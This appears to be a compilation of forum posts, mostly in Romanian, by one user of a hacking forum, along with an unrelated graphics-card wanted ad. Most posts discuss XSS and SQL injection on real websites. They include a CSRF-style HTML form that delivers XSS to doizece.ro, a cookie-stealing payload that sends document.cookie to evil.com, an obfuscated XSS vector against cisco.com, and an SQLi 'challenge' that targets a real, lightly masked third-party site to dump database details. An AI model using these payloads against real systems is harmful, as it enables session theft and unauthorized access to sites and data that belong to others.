dancezar

Asta este cererea post POST REQUEST title=asdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhjasdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhjasdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhjasdasndasdhashdjahdjasasdasndasdhashdjahdjashjasdjasdhj%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E& message_backup=gdfdfgghfghgfhgffg&message=gdfdfgghfghgfhgffg&wysiwyg=1 &iconid=0& s=&[COLOR="#FF0000"]securitytoken=1378319885-ec2663c8b3a45b95824d484e8e4aea7be94f68d4[/COLOR]&do=postreply&t=1&p=&specifiedpost=0&posthash=2ebffc76043a2b2aaaba9e76de13b445&poststarttime=1378319752&loggedinuser=1&multiquoteempty=only&preview=Preview+Post&parseurl=1 Toate bune si frumoase dar cum ai sa furi securitoken a utilizatorului atacat (este complet random nu ai cum sa il ghicesti)? //Fara el nu s-ar putea finaliza actiunea //Concluzie frumoasa gaselita nu ca nu as respacta munca omului dar fara o modalitate de a fura tokenu este nefolositor

This is a real challenge very nice:)

Am raportat acum 2 zile un xss intr-un domeniu care le apartine lor nu e microsoft da le apartine lor,si voi primi si eu luna aceasta HOF voi posta xss-u atunci cand v-a fi reparat:)

Defapt merge exploatat in felul asta: <form action="http://www.doizece.ro/account/password-recovery" method="POST"> <input type="hidden" name="email" value="'><script>alert(1)</script>" /> <input type="hidden" name="submit" value="Trimite" /> <input type="submit" value="XSS Click Here" /> </form> Codul HTML il stochezi pe un site,in inputul email se afla vectorul xss care v-a fi trimis pe pagina lor.Daca victima da click pe acel buton vectorul xss v-a fi trimis pe pagina doizece si executat:)

'><script>document.location="http://evil.com/script.php?c="+document.cookie;</script> http://evil.com/script.php inregistreaza acel paramtru c intr-un fisier sau intr-o baza de date c find cookieurile victimei

'><script>alert(1)</script> la mine functioneaza

BIG LIKE Thanks ajkaro for the challenge

Cumpar placa video cu urmatoarele specificatii: Tip de memorie: ddr3/ddr2 Memorie: 512/1gb Bits: 64/128 Slot: pci expres Marca: Nu prea are importanta Nu sariti cu preturi de magazin mai ales ca nu vreau o placa noua ci una poate putin mai veche dar in stare perfecta de functionare.//Am uitat sa specific 200 lei este suma maxima sau mai pot oferi la schimb o placa de baza ddr2 socket 775 MSI un ram de 1gb ddr2 sau ps2 modat:) Astept orferte pe PM sau aici. Stima:)

//edit scuze este doar o eroare provocata de setarile de la baza de date posibil sa nu fie bune am crezut ca ai generato tu pentru un sqli

Done:) Challenge difficulty:ajkaro

Done. Thanks ajkaro for the challenge.

http://s24.postimg.org/8icchmqv9/sqli_ajkaro.png I use javascript to show my name ,you have pm

As vrea sa cred ca nu e adevarat poate totusi imi da sintaxa pe pm dar totusi pare ca e facatura poza,parerea mea. //Edit este fake se oberva la nickul lui codita de la y albastra

Bravo baieti:D kronZy.dll astept sintaxa ta prin pm:)

Good ajkaro

Target:w[blank]w.pelic[blank]an.com/lights_de[blank]tail.php?record[blank]ID=2220 Stergeti [blank] Dificulatate:Easy poate putin putin mediu Cerinte afisati urmatoarele: -Versiunea bazei de date -Numarul total de tabele din baza de date curenta -Nickul vostru -Toate tabele din baza de date curenta care incep cu litera M -Fiecare tabel afisat sa aibe numerotare -Tote cerintele sa fie indeplinite pe o singura coloana -Culorile nu sunt obligatorii doar daca doriti Reguli: -Nu divulgati rezolvarea decat dupa ce spun eu ca challenge-ul v-a fi inchis Proof: Solvers: -ajkaro -Renegade -askwrite -

este in cisco dar miraki nu face parte tot din cisco?

Target:cisco.com Exploit:Cross site scripting Type:Reflected Method:GET Vector folosit: -" %6fnmouseover="eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 100, 97, 110, 121, 119, 101, 98, 48, 57, 39, 41)) - sau <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 100, 97, 110, 121, 119, 101, 98, 48, 57, 39, 41))<%2fscript> P.o.C http://s15.postimg.org/xdok4bf4a/cisco1.jpg -Am sa il raportez desi sunt sigur 80% ca e dublicate

Dap da print la document.domain asa stim sigur daca este google si nu google.ceva.com

http://s13.postimg.org/lk21eqhty/sqli_ajkaro3.jpg Very very nice challenge thanks:D

http://s7.postimg.org/5zllvk7ay/sqli_tod.jpg Was easy thanks:D

Acolo este xss lui akkilion al meu era in store: 2013-06-24 store.apple.com A reflected cross-site scripting issue was addressed. We would like to acknowledge Stefan Schurtz of darksecurity.de, David Hoyt of Hoyt LLC Research, Pobereznicenco Dan of rstforums.com, and Danalachi Sergiu for reporting this issue. Au mai raportat 3 persoane inafara de mine xss-u si asta imi place la hall of fame-ul lor daca mai multe persoane au gasit acelasi xss ii trece pe toti acolo la ei nu exista dublicate